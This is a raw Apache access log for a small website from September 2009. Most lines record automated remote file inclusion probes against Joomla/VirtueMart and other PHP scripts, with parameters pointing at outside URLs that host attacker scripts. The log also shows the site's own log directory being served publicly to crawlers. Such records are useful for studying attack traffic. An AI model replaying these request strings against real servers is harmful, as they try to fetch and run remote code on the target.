118.129.166.10 - - [01/Sep/2009:22:35:31 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:35:47 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:36:18 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
195.207.160.102 - - [01/Sep/2009:22:38:42 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Sep/2009:22:38:42 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Sep/2009:22:38:42 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.195.7 - - [01/Sep/2009:22:43:13 -0700] "GET /logs/access.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:43:13 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:43:14 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:22:52:57 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:22:52:57 -0700] "GET /logs/access_090701.log%20%20/convert/mvcw.php?step=1&vwar_root=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:22:52:57 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:22:57:50 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:22:57:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:22:57:50 -0700] "GET /logs/access_090701.log%20%20/convert/mvcw.php?step=1&vwar_root=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:23:08:21 -0700] "GET /logs/access.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
130.36.155.110 - - [01/Sep/2009:23:20:12 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?q=Wirama+www&hl=en&sa=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
130.36.155.110 - - [01/Sep/2009:23:20:24 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
91.121.89.135 - - [01/Sep/2009:23:23:27 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.121.89.135 - - [01/Sep/2009:23:23:28 -0700] "GET /logs/access_090401.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.121.89.135 - - [01/Sep/2009:23:23:28 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:29:49 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:29:49 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:29:49 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:29:54 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:32:15 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:32:15 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:32:15 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:32:19 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:33:24 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:33:24 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:33:24 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:23:33:32 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.18.168.84 - - [01/Sep/2009:23:37:52 -0700] "GET /logs/access_090701.log/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:23:37:52 -0700] "GET /appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:23:37:53 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:23:39:11 -0700] "GET /logs/access_090701.log%20/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:23:39:11 -0700] "GET /appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:23:39:11 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:23:44:03 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:23:44:03 -0700] "GET /appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.18.168.84 - - [01/Sep/2009:23:45:14 -0700] "GET /logs/access_090701.log%20/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:23:46:42 -0700] "GET /appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.18.168.84 - - [01/Sep/2009:23:46:45 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
199.96.29.70 - - [02/Sep/2009:00:00:12 -0700] "GET /logs/index.php?option=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "wirama.com"
199.96.29.70 - - [02/Sep/2009:00:00:12 -0700] "GET /index.php?option=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "wirama.com"
217.237.151.52 - - [02/Sep/2009:00:04:30 -0700] "GET /logs/access.log HTTP/1.0" 200 483796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8" "www.wirama.com"
72.11.145.8 - - [02/Sep/2009:00:04:31 -0700] "GET /logs/access_090701.log/appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
123.213.63.137 - - [02/Sep/2009:00:04:58 -0700] "GET /snippet.reflect.php?reflect_base=http://arda.or.th/userfiles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
123.213.63.137 - - [02/Sep/2009:00:04:58 -0700] "GET /logs/snippet.reflect.php?reflect_base=http://arda.or.th/userfiles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
123.213.63.137 - - [02/Sep/2009:00:05:52 -0700] "GET /logs/snippet.reflect.php?reflect_base=http://arda.or.th/userfiles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
123.213.63.137 - - [02/Sep/2009:00:05:52 -0700] "GET /snippet.reflect.php?reflect_base=http://arda.or.th/userfiles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:17:16 -0700] "GET /logs/errors.php?error=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:17:16 -0700] "GET /errors.php?error=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:17:39 -0700] "GET /errors.php?error=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:17:39 -0700] "GET /logs/errors.php?error=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:18:51 -0700] "GET /logs/index.php?option=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:18:51 -0700] "GET /index.php?option=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:18:52 -0700] "GET /logs/index.php?option=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:18:52 -0700] "GET /index.php?option=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:22:50 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:00:22:50 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
210.114.225.248 - - [02/Sep/2009:00:27:06 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.114.225.248 - - [02/Sep/2009:00:27:06 -0700] "GET /logs/access_090801.log//index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.114.225.248 - - [02/Sep/2009:00:27:06 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:55 -0700] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:55 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:55 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:56 -0700] "GET /logs/access_090801.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:59 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:59 -0700] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:59 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.253.216 - - [02/Sep/2009:00:31:59 -0700] "GET /logs/access_090801.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/chat/pebri/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.50 - - [02/Sep/2009:00:35:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [02/Sep/2009:00:35:40 -0700] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
69.36.9.113 - - [02/Sep/2009:00:44:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.36.9.113 - - [02/Sep/2009:00:44:04 -0700] "GET /skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.36.9.113 - - [02/Sep/2009:00:44:04 -0700] "GET /logs/access_090531.log//skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.36.9.113 - - [02/Sep/2009:00:44:53 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.232.10 - - [02/Sep/2009:00:49:22 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
91.121.89.135 - - [02/Sep/2009:00:50:18 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.121.89.135 - - [02/Sep/2009:00:50:18 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.121.89.135 - - [02/Sep/2009:00:50:18 -0700] "GET /logs/access_090601.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [02/Sep/2009:00:52:14 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.94.125.100 - - [02/Sep/2009:00:52:14 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.36.9.113 - - [02/Sep/2009:00:56:33 -0700] "GET /logs/access_090531.log%20//skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.36.9.113 - - [02/Sep/2009:00:56:38 -0700] "GET /logs/access.log%20//skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
91.121.89.135 - - [02/Sep/2009:00:57:14 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.121.89.135 - - [02/Sep/2009:00:57:14 -0700] "GET /logs/access_090701.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.121.89.135 - - [02/Sep/2009:00:57:14 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fpgo.ru/downloads/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.34.162.154 - - [02/Sep/2009:00:59:00 -0700] "GET /login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.162.154 - - [02/Sep/2009:00:59:04 -0700] "GET /logs/access_090331.log//login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.162.154 - - [02/Sep/2009:00:59:05 -0700] "GET /logs//login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.36.9.113 - - [02/Sep/2009:01:03:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.36.9.113 - - [02/Sep/2009:01:03:12 -0700] "GET /skin/zero_vote/error.php?dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
64.34.162.154 - - [02/Sep/2009:01:12:06 -0700] "GET /logs/access_090701.log%20%20//login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.34.162.154 - - [02/Sep/2009:01:12:06 -0700] "GET /login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.34.162.154 - - [02/Sep/2009:01:12:06 -0700] "GET /logs//login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.34.162.154 - - [02/Sep/2009:01:12:23 -0700] "GET /logs/access_090331.log%20%20//login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.208.52 - - [02/Sep/2009:01:21:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.52 - - [02/Sep/2009:01:21:50 -0700] "GET /logs/access_090531.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
64.34.162.154 - - [02/Sep/2009:01:40:03 -0700] "GET /logs/access_090601.log//login.php?dir=http://www.hmg.com.tw/ad/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.64 - - [02/Sep/2009:02:10:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.64 - - [02/Sep/2009:02:10:01 -0700] "GET /logs/ HTTP/1.1" 200 2851 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
203.17.154.101 - - [02/Sep/2009:02:18:54 -0700] "GET /errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
203.17.154.101 - - [02/Sep/2009:02:25:14 -0700] "GET /logs/access_090501.log/errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
203.17.154.101 - - [02/Sep/2009:02:25:15 -0700] "GET /errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
203.17.154.101 - - [02/Sep/2009:02:25:15 -0700] "GET /logs/errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
203.17.154.101 - - [02/Sep/2009:02:27:15 -0700] "GET /logs/access_090501.log/errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
203.17.154.101 - - [02/Sep/2009:02:27:16 -0700] "GET /errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
203.17.154.101 - - [02/Sep/2009:02:27:16 -0700] "GET /logs/errors.php?error=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
74.6.8.99 - - [02/Sep/2009:02:33:20 -0700] "GET /?M=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
62.119.28.103 - - [02/Sep/2009:02:34:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
62.119.28.103 - - [02/Sep/2009:02:34:28 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:02:41:44 -0700] "GET /logs///setup.php?dir=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [02/Sep/2009:02:41:44 -0700] "GET //setup.php?dir=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
219.85.63.226 - - [02/Sep/2009:02:42:57 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
